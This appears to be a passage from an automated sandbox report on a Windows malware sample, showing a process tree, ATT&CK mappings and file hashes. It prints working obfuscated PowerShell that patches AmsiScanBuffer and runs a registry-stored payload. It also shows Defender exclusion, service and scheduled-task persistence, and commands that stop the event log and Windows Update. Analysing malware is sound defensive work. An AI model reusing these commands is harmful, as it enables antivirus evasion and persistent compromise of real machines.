$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+'i'+''+'c'+'ro'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.Un'+'s'+'a'+[Char](102)+''+'e'+''+'N'+'a'+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'od'+'s'+'');$IRRkTkPWrSBpRK=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'ic'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jPtdBsPkTWyCVjbdkiF=rWNoSHwYnwkI @([String])([IntPtr]);$ttwoMDhqFKncjBHCysbhgm=rWNoSHwYnwkI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$joJWgnTTDmi=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$gaQMctFYLwqKhG=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'br'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$qxJzCAuMKBcmkjfBg=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ElhYZqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaQMctFYLwqKhG,$jPtdBsPkTWyCVjbdkiF).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+'.dl'+[Char](108)+'');$BdgjQiKwxREMtcYjP=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$ElhYZqC,[Object](''+'A'+'ms'+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$RBsNwuxrLP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,4,[ref]$RBsNwuxrLP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BdgjQiKwxREMtcYjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,0x20,[ref]$RBsNwuxrLP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+'rs'+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5316 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5992
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OGmlLWAVqpge{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TsNhdFnLxjfEog,[Parameter(Position=1)][Type]$jyDNPwBZvD)$oNgAvRiMVzR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+''+'s'+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+'le'+[Char](100)+''+','+'A'+'n'+'s'+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$oNgAvRiMVzR.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'P'+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+'d');$oNgAvRiMVzR.DefineMethod('I'+'n'+''+'v'+'ok'+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+'t'+','+[Char](86)+'ir'+'t'+'u'+[Char](97)+''+[Char](108)+'',$jyDNPwBZvD,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $oNgAvRiMVzR.CreateType();}$gfxDMLZvsoWkp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$aUnKfREvwPIzwM=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HFxtNqoXAbLcrxCPVFX=OGmlLWAVqpge @([String])([IntPtr]);$qtIpSTWHCzQzpOeBuGGPuN=OGmlLWAVqpge @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fLxLQMkrzuH=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+'e'+'tMo'+[Char](100)+'u'+[Char](108)+''+'e'+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$EmGnHNgYXIcANx=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$wdEPlweooazpnKfOR=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ttOjfWX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EmGnHNgYXIcANx,$HFxtNqoXAbLcrxCPVFX).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$cvXVWYJuPXJOoVoRH=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$ttOjfWX,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+'e'+''+'r'+'')));$FcgrhMHjCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,4,[ref]$FcgrhMHjCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXVWYJuPXJOoVoRH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,0x20,[ref]$FcgrhMHjCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'WAR'+[Char](69)+'').GetValue('di'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:964
-
-
-
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Executes dropped EXE
PID:5608
-
-
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Executes dropped EXE
PID:5208
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1284
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2772
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2032
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2556
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3104
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\systemprocess.exe"C:\Windows\systemprocess.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3340
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
-
-
C:\Windows\host.exe"C:\Windows\host.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2332
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:5820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:1512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:5740
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "PROCESS HOST"4⤵
- Launches sc.exe
PID:4456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"4⤵
- Launches sc.exe
PID:896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3200
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "PROCESS HOST"4⤵
- Launches sc.exe
PID:1764
-
-
-
C:\Windows\CompPkg.exe"C:\Windows\CompPkg.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4768
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5156 -
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3464
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3820
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3872
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3940
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:5876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:6064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:5796
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:5084
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:652
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3620
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2404
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exeC:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:6088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3408
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5008
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:5268
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54a01567f513143419390cb40e6abaf71
SHA1d0d714d6e526a652fc4e5de4e6040d6b0e7687ab
SHA2566efaeb6a1b391155453a57c7e437575bb18efc174f3099d984d9dea49eecebad
SHA512379fcb42d0f72d302482fadd4f25cbfa9c5f6a9c50222877d0eed91f237ec688eb52f65ee0d3fccfd017a6b14bd36f34fa0b77a388728fe3942a981322d7a4bc
-
Filesize
1KB
MD586c4045b8d294c8282009af508fff707
SHA156932ef154b5ed1046300446bacf50a8d44c147b
SHA2562890b9aa2b9b856fe1b3de029e8bb42d28f961ee99c1362b5c31a91ec3fee059
SHA512f1bf59232a6ab749ace9245a89029f0e064f132c9515477c0213c6f942341d2b5493cd0adbaa3a401b87078aec3dd9f1f5eed9ad393672e555c02e539a079648
-
Filesize
17KB
MD586acdf583fc319a406c3f74a61d663fa
SHA1604996c51c6aec2620a45decd4e59764e708c08f
SHA2563a88e39b770621c79be35fbf685baf5e3cc9ce16fcf91bc67ac06247d081278c
SHA512f3e990090e66e4fe13659827b9405dc312abf81e6432da18ae11d0fa4b0ed5399bb4d9dc597459b5d5bdf333efdac702db4d78305ae9c0768f37229a27c17368
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
402KB
MD539ba631f3e54a2c480e7c83e5e6d14ff
SHA182f3e3f1faf9d879a37e473a81cb5d32672af099
SHA2563dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64
SHA5120c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16
-
Filesize
2.7MB
MD51cf0ec247776f6817231070a2f75994c
SHA13253eccccece8243d11975e7021569251def8f2f
SHA256e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051
SHA512f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
-
Filesize
1.5MB
MD5b5e966fbfca567c51d5da8b2106a48e5
